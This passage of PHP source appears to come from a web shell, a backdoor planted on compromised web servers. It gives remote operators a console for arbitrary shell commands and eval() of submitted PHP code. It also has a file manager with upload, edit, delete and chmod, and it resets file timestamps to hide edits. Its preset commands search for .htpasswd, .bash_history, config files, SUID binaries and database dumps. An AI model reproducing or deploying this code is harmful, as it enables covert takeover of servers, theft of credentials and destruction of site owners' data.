  515.             }
  516.         }
  517.     }
  518.     hardHeader();
  519.     echo '<h1>File tools</h1><div class=content>';
  520.     if( !file_exists(@$_POST['p1']) ) {
  521.         echo 'File not exists';
  522.         hardFooter();
  523.         return;
  524.     }
  525.     $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  526.     if(!$uid) {
  527.         $uid['name'] = @fileowner($_POST['p1']);
  528.         $gid['name'] = @filegroup($_POST['p1']);
  529.     } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
  530.     echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  531.     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  532.     if( empty($_POST['p2']) )
  533.         $_POST['p2'] = 'view';
  534.     if( is_file($_POST['p1']) )
  535.         $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
  536.     else
  537.         $m = array('Chmod', 'Rename', 'Touch');
  538.     foreach($m as $v)
  539.         echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  540.     echo '<br><br>';
  541.     switch($_POST['p2']) {
  542.         case 'view':
  543.             echo '<pre class=ml1>';
  544.             $fp = @fopen($_POST['p1'], 'r');
  545.             if($fp) {
  546.                 while( !@feof($fp) )
  547.                     echo htmlspecialchars(@fread($fp, 1024));
  548.                 @fclose($fp);
  549.             }
  550.             echo '</pre>';
  551.             break;
  552.         case 'highlight':
  553.             if( @is_readable($_POST['p1']) ) {
  554.                 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  555.                 $oRb = @highlight_file($_POST['p1'],true);
  556.                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';
  557.             }
  558.             break;
  559.         case 'chmod':
  560.             if( !empty($_POST['p3']) ) {
  561.                 $perms = 0;
  562.                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  563.                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  564.                 if(!@chmod($_POST['p1'], $perms))
  565.                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  566.             }
  567.             clearstatcache();
  568.             echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';
  569.             break;
  570.         case 'edit':
  571.             if( !is_writable($_POST['p1'])) {
  572.                 echo 'File isn\'t writeable';
  573.                 break;
  574.             }
  575.             if( !empty($_POST['p3']) ) {
  576.                 $time = @filemtime($_POST['p1']);
  577.                 $_POST['p3'] = substr($_POST['p3'],1);
  578.                 $fp = @fopen($_POST['p1'],"w");
  579.                 if($fp) {
  580.                     @fwrite($fp,$_POST['p3']);
  581.                     @fclose($fp);
  582.                     echo 'Saved!<br><script>p3_="";</script>';
  583.                     @touch($_POST['p1'],$time,$time);
  584.                 }
  585.             }
  586.             echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
  587.             $fp = @fopen($_POST['p1'], 'r');
  588.             if($fp) {
  589.                 while( !@feof($fp) )
  590.                     echo htmlspecialchars(@fread($fp, 1024));
  591.                 @fclose($fp);
  592.             }
  593.             echo '</textarea><input type=submit value="submit"></form>';
  594.             break;
  595.         case 'hexdump':
  596.             $c = @file_get_contents($_POST['p1']);
  597.             $n = 0;
  598.             $h = array('00000000<br>','','');
  599.             $len = strlen($c);
  600.             for ($i=0; $i<$len; ++$i) {
  601.                 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  602.                 switch ( ord($c[$i]) ) {
  603.                     case 0:  $h[2] .= ' '; break;
  604.                     case 9:  $h[2] .= ' '; break;
  605.                     case 10: $h[2] .= ' '; break;
  606.                     case 13: $h[2] .= ' '; break;
  607.                     default: $h[2] .= $c[$i]; break;
  608.                 }
  609.                 $n++;
  610.                 if ($n == 32) {
  611.                     $n = 0;
  612.                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  613.                     $h[1] .= '<br>';
  614.                     $h[2] .= "\n";
  615.                 }
  616.             }
  617.             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#12151d><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#12151d><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  618.             break;
  619.         case 'rename':
  620.             if( !empty($_POST['p3']) ) {
  621.                 if(!@rename($_POST['p1'], $_POST['p3']))
  622.                     echo 'Can\'t rename!<br>';
  623.                 else
  624.                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  625.             }
  626.             echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';
  627.             break;
  628.         case 'touch':
  629.             if( !empty($_POST['p3']) ) {
  630.                 $time = strtotime($_POST['p3']);
  631.                 if($time) {
  632.                     if(!touch($_POST['p1'],$time,$time))
  633.                         echo 'Fail!';
  634.                     else
  635.                         echo 'Touched!';
  636.                 } else echo 'Bad time format!';
  637.             }
  638.             clearstatcache();
  639.             echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';
  640.             break;
  641.         /* (?) 12.2015 mitryz */
  642.         case 'frame':
  643.             $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
  644.             if ($frameSrc[0] != '/')
  645.                 $frameSrc = '/' . $frameSrc;
  646.             if ($frameSrc[strlen($frameSrc) - 1] != '/')
  647.                 $frameSrc = $frameSrc . '/';
  648.             $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
  649.             echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
  650.             break;
  651.     }
  652.     echo '</div>';
  653.     hardFooter();
  654. }
  655. if($os == 'win')
  656.     $aliases = array(
  657.         "List Directory" => "dir",
  658.         "Find index.php in current dir" => "dir /s /w /b index.php",
  659.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  660.         "Show active connections" => "netstat -an",
  661.         "Show running services" => "net start",
  662.         "User accounts" => "net user",
  663.         "Show computers" => "net view",
  664.         "ARP Table" => "arp -a",
  665.         "IP Configuration" => "ipconfig /all"
  666.     );
  667. else
  668.     $aliases = array(
  669.         "List dir" => "ls -lha",
  670.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  671.         "show opened ports" => "netstat -an | grep -i listen",
  672.         "process status" => "ps aux",
  673.         "Find" => "",
  674.         "find all suid files" => "find / -type f -perm -04000 -ls",
  675.         "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  676.         "find all sgid files" => "find / -type f -perm -02000 -ls",
  677.         "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  678.         "find config.inc.php files" => "find / -type f -name config.inc.php",
  679.         "find config* files" => "find / -type f -name \"config*\"",
  680.         "find config* files in current dir" => "find . -type f -name \"config*\"",
  681.         "find all writable folders and files" => "find / -perm -2 -ls",
  682.         "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  683.         "find all service.pwd files" => "find / -type f -name service.pwd",
  684.         "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  685.         "find all .htpasswd files" => "find / -type f -name .htpasswd",
  686.         "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  687.         "find all .bash_history files" => "find / -type f -name .bash_history",
  688.         "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  689.         "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  690.         "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  691.         "Locate" => "",
  692.         "locate httpd.conf files" => "locate httpd.conf",
  693.         "locate vhosts.conf files" => "locate vhosts.conf",
  694.         "locate proftpd.conf files" => "locate proftpd.conf",
  695.         "locate psybnc.conf files" => "locate psybnc.conf",
  696.         "locate my.conf files" => "locate my.conf",
  697.         "locate admin.php files" =>"locate admin.php",
  698.         "locate cfg.php files" => "locate cfg.php",
  699.         "locate conf.php files" => "locate conf.php",
  700.         "locate config.dat files" => "locate config.dat",
  701.         "locate config.php files" => "locate config.php",
  702.         "locate config.inc files" => "locate config.inc",
  703.         "locate config.inc.php" => "locate config.inc.php",
  704.         "locate config.default.php files" => "locate config.default.php",
  705.         "locate config* files " => "locate config",
  706.         "locate .conf files"=>"locate '.conf'",
  707.         "locate .pwd files" => "locate '.pwd'",
  708.         "locate .sql files" => "locate '.sql'",
  709.         "locate .htpasswd files" => "locate '.htpasswd'",
  710.         "locate .bash_history files" => "locate '.bash_history'",
  711.         "locate .mysql_history files" => "locate '.mysql_history'",
  712.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  713.         "locate backup files" => "locate backup",
  714.         "locate dump files" => "locate dump",
  715.         "locate priv files" => "locate priv"
  716.     );
  717. function actionConsole() {
  718.     if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
  719.         prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
  720.         $_POST['p1'] .= ' 2>&1';
  721.     } elseif(!empty($_POST['p1']))
  722.         prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
  723.     if(isset($_POST['ajax'])) {
  724.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  725.         ob_start();
  726.         echo "d.cf.cmd.value='';\n";
  727.         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
  728.         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  729.             if(@chdir($match[1])) {
  730.                 $GLOBALS['cwd'] = @getcwd();
  731.                 echo "c_='".$GLOBALS['cwd']."';";
  732.             }
  733.         }
  734.         echo "d.cf.output.value+='".$temp."';";
  735.         echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
  736.         $temp = ob_get_clean();
  737.         echo strlen($temp), "\n", $temp;
  738.         exit;
  739.     }
  740.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  741.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  742.     hardHeader();
  743.     echo "<script>
  744. if(window.Event) window.captureEvents(Event.KEYDOWN);
  745. var cmds = new Array('');
  746. var cur = 0;
  747. function kp(e) {
  748.     var n = (window.Event) ? e.which : e.keyCode;
  749.     if(n == 38) {
  750.         cur--;
  751.         if(cur>=0)
  752.             document.cf.cmd.value = cmds[cur];
  753.         else
  754.             cur++;
  755.     } else if(n == 40) {
  756.         cur++;
  757.         if(cur < cmds.length)
  758.             document.cf.cmd.value = cmds[cur];
  759.         else
  760.             cur--;
  761.     }
  762. }
  763. function add(cmd) {
  764.     cmds.pop();
  765.     cmds.push(cmd);
  766.     cmds.push('');
  767.     cur = cmds.length-1;
  768. }
  769. </script>";
  770.     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';
  771.     foreach($GLOBALS['aliases'] as $n => $v) {
  772.         if($v == '') {
  773.             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  774.             continue;
  775.         }
  776.         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  777.     }
  778.    
  779.     echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';
  780.     if(!empty($_POST['p1'])) {
  781.         echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  782.     }
  783.     echo '</textarea><table class=main cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="width:100%;" onkeydown="kp(event);"></td></tr></table>';
  784.     echo '</form></div><script>d.cf.cmd.focus();</script>';
  785.     hardFooter();
  786. }
  787. function actionPhp() {
  788.     if( isset($_POST['ajax']) ) {
  789.         $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  790.         ob_start();
  791.         eval($_POST['p1']);
  792.         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  793.         echo strlen($temp), "\n", $temp;
  794.         exit;
  795.     }
  796.     hardHeader();
  797.     if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  798.         echo '<h1>PHP info</h1><div class=content>';
  799.         ob_start();
  800.         phpinfo();
  801.         $tmp = ob_get_clean();
  802.         $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  803.         $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  804.         $tmp = preg_replace('!h1!msiU','h2',$tmp);
  805.         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  806.         $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  807.         echo $tmp;
  808.         echo '</div><br>';
  809.     }
  810.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  811.         $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  812.         echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  813.     echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  814.     if(!empty($_POST['p1'])) {
  815.         ob_start();
  816.         eval($_POST['p1']);
  817.         echo htmlspecialchars(ob_get_clean());
  818.     }
  819.     echo '</pre></div>';
  820.     hardFooter();
  821. }
  822. function actionFilesMan() {
  823.     if (!empty ($_COOKIE['f']))
  824.         $_COOKIE['f'] = @unserialize($_COOKIE['f']);
  825.    
  826.     if(!empty($_POST['p1'])) {
  827.         switch($_POST['p1']) {
  828.             case 'uploadFile':
  829.                 if ( is_array($_FILES['f']['tmp_name']) ) {
  830.                     foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
  831.                         if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
  832.                                 echo "Can't upload file!";
  833.                             }
  834.                         }
  835.                     }
  836.                 break;
  837.             case 'mkdir':
  838.                 if(!@mkdir($_POST['p2']))
  839.                     echo "Can't create new dir";
  840.                 break;
  841.             case 'delete':
  842.                 function deleteDir($path) {
  843.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  844.                     $dh  = opendir($path);
  845.                     while ( ($microsoft = readdir($dh) ) !== false) {
  846.                         $microsoft = $path.$microsoft;
  847.                         if ( (basename($microsoft) == "..") || (basename($microsoft) == ".") )
  848.                             continue;
  849.                         $type = filetype($microsoft);
  850.                         if ($type == "dir")
  851.                             deleteDir($microsoft);
  852.                         else
  853.                             @unlink($microsoft);
  854.                     }
  855.                     closedir($dh);
  856.                     @rmdir($path);
  857.                 }
  858.                 if(is_array(@$_POST['f']))
  859.                     foreach($_POST['f'] as $f) {
  860.                         if($f == '..')
  861.                             continue;
  862.                         $f = urldecode($f);
  863.                         if(is_dir($f))
  864.                             deleteDir($f);
  865.                         else
  866.                             @unlink($f);
  867.                     }
  868.                 break;
  869.             case 'paste':
  870.                 if($_COOKIE['act'] == 'copy') {
  871.                     function copy_paste($c,$s,$d){
  872.                         if(is_dir($c.$s)){
  873.                             mkdir($d.$s);
  874.                             $h = @opendir($c.$s);
  875.                             while (($f = @readdir($h)) !== false)
  876.                                 if (($f != ".") and ($f != ".."))
  877.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  878.                         } elseif(is_file($c.$s))
  879.                             @copy($c.$s, $d.$s);
  880.                     }
  881.                     foreach($_COOKIE['f'] as $f)
  882.                         copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
  883.                 } elseif($_COOKIE['act'] == 'move') {
  884.                     function move_paste($c,$s,$d){
  885.                         if(is_dir($c.$s)){
  886.                             mkdir($d.$s);
  887.                             $h = @opendir($c.$s);
  888.                             while (($f = @readdir($h)) !== false)
  889.                                 if (($f != ".") and ($f != ".."))
  890.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  891.                         } elseif(@is_file($c.$s))
  892.                             @copy($c.$s, $d.$s);
  893.                     }
  894.                     foreach($_COOKIE['f'] as $f)
  895.                         @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
  896.                 } elseif($_COOKIE['act'] == 'zip') {
  897.                     if(class_exists('ZipArchive')) {
  898.                         $zip = new ZipArchive();
  899.                         if ($zip->open($_POST['p2'], 1)) {
  900.                             chdir($_COOKIE['c']);
  901.                             foreach($_COOKIE['f'] as $f) {
  902.                                 if($f == '..')
  903.                                     continue;
  904.                                 if(@is_file($_COOKIE['c'].$f))
  905.                                     $zip->addFile($_COOKIE['c'].$f, $f);
  906.                                 elseif(@is_dir($_COOKIE['c'].$f)) {
  907.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
  908.                                     foreach ($iterator as $key=>$value) {
  909.                                         $zip->addFile(realpath($key), $key);
  910.                                     }
  911.                                 }
  912.                             }
  913.                             chdir($GLOBALS['cwd']);
  914.                             $zip->close();
  915.                         }
  916.                     }
  917.                 } elseif($_COOKIE['act'] == 'unzip') {
  918.                     if(class_exists('ZipArchive')) {
  919.                         $zip = new ZipArchive();
  920.                         foreach($_COOKIE['f'] as $f) {
  921.                             if($zip->open($_COOKIE['c'].$f)) {
  922.                                 $zip->extractTo($GLOBALS['cwd']);
  923.                                 $zip->close();
  924.                             }
  925.                         }
  926.                     }
  927.                 } elseif($_COOKIE['act'] == 'tar') {
  928.                     chdir($_COOKIE['c']);
  929.                     $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
  930.                     ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
  931.                     chdir($GLOBALS['cwd']);
  932.                 }
  933.                 unset($_COOKIE['f']);
  934.                 setcookie('f', '', time() - 3600);
  935.                 break;
  936.             default:
  937.                 if(!empty($_POST['p1'])) {
  938.                     prototype('act', $_POST['p1']);
  939.                     prototype('f', serialize(@$_POST['f']));
  940.                     prototype('c', @$_POST['c']);
  941.                 }
  942.                 break;
  943.         }
  944.     }
  945.     hardHeader();
  946.     echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
  947.     $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  948.     if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
  949.     global $sort;
  950.     $sort = array('name', 1);
  951.     if(!empty($_POST['p1'])) {
  952.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  953.             $sort = array($match[1], (int)$match[2]);
  954.     }
  955. echo "<script>
  956.     function sa() {
  957.         for(i=0;i<d.files.elements.length;i++)
  958.             if(d.files.elements[i].type == 'checkbox')
  959.                 d.files.elements[i].checked = d.files.elements[0].checked;
  960.     }
  961. </script>
  962. <table class='fm main' cellspacing='0' cellpadding='2'>
  963. <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  964.     $dirs = $files = array();
  965.     $n = count($dirContent);
  966.     for($i=0;$i<$n;$i++) {
  967.         $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  968.         $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  969.         $tmp = array('name' => $dirContent[$i],
  970.                      'path' => $GLOBALS['cwd'].$dirContent[$i],
  971.                      'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
  972.                      'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
  973.                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  974.                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  975.                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  976.                     );
  977.         if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
  978.             $files[] = array_merge($tmp, array('type' => 'file'));
  979.         elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
  980.             $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  981.         elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
  982.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  983.     }
  984.     $GLOBALS['sort'] = $sort;
  985.     function cmp($a, $b) {
  986.         if($GLOBALS['sort'][0] != 'size')
  987.             return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  988.         else
  989.             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  990.     }
  991.     usort($files, "cmp");
  992.     usort($dirs, "cmp");
  993.     $files = array_merge($dirs, $files);
  994.     $l = 0;
  995.     foreach($files as $f) {
  996.         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  997.             .'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  998.         $l = $l?0:1;
  999.     }
  1000.     echo "<tr id=fak><td colspan=7>
  1001.     <input type=hidden name=ne value=''>
  1002.     <input type=hidden name=a value='FilesMan'>
  1003.     <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  1004.     <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  1005.     <label><select name='p1'>";
  1006.     if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
  1007.         echo "<option value='paste'>? Paste</option>";
  1008.     echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
  1009.     if(class_exists('ZipArchive'))
  1010.         echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
  1011.     echo "<option value='tar'>+ tar.gz</option>";
  1012.     echo "</select></label>";
  1013.     if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
  1014.         echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
  1015.     echo "<input type='submit' value='submit'></td></tr></form></table></div>";
  1016.     hardFooter();
  1017. }
  1018. function actionStringTools() {
  1019.     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  1020.     if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
  1021.     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  1022.     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
  1023.     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  1024.     $stringTools = array(
  1025.         'Base64 encode' => 'base64_encode',
  1026.         'Base64 decode' => 'base64_decode',
  1027.         'Url encode' => 'urlencode',
  1028.         'Url decode' => 'urldecode',
  1029.         'Full urlencode' => 'full_urlencode',
  1030.         'md5 hash' => 'md5',
  1031.         'sha1 hash' => 'sha1',
  1032.         'crypt' => 'crypt',
  1033.         'CRC32' => 'crc32',
  1034.         'ASCII to HEX' => 'ascii2hex',
  1035.         'HEX to ASCII' => 'hex2ascii',
  1036.         'HEX to DEC' => 'hexdec',
  1037.         'HEX to BIN' => 'hex2bin',
  1038.         'DEC to HEX' => 'dechex',
  1039.         'DEC to BIN' => 'decbin',
  1040.         'BIN to HEX' => 'binhex',
  1041.         'BIN to DEC' => 'bindec',
  1042.         'String to lower case' => 'strtolower',
  1043.         'String to upper case' => 'strtoupper',
  1044.         'Htmlspecialchars' => 'htmlspecialchars',
  1045.         'String length' => 'strlen',
  1046.     );
  1047.     if(isset($_POST['ajax'])) {
  1048.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  1049.         ob_start();
  1050.         if(in_array($_POST['p1'], $stringTools))
  1051.             echo $_POST['p1']($_POST['p2']);
  1052.         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  1053.         echo strlen($temp), "\n", $temp;
  1054.         exit;
  1055.     }
  1056.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1057.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  1058.     hardHeader();
  1059.     echo '<h1>String conversions</h1><div class=content>';
  1060.     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
  1061.     foreach($stringTools as $k => $v)
  1062.         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  1063.         echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  1064.     if(!empty($_POST['p1'])) {
  1065.         if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
  1066.     }
  1067.     echo"</pre></div><br><h1>Search files:</h1><div class=content>
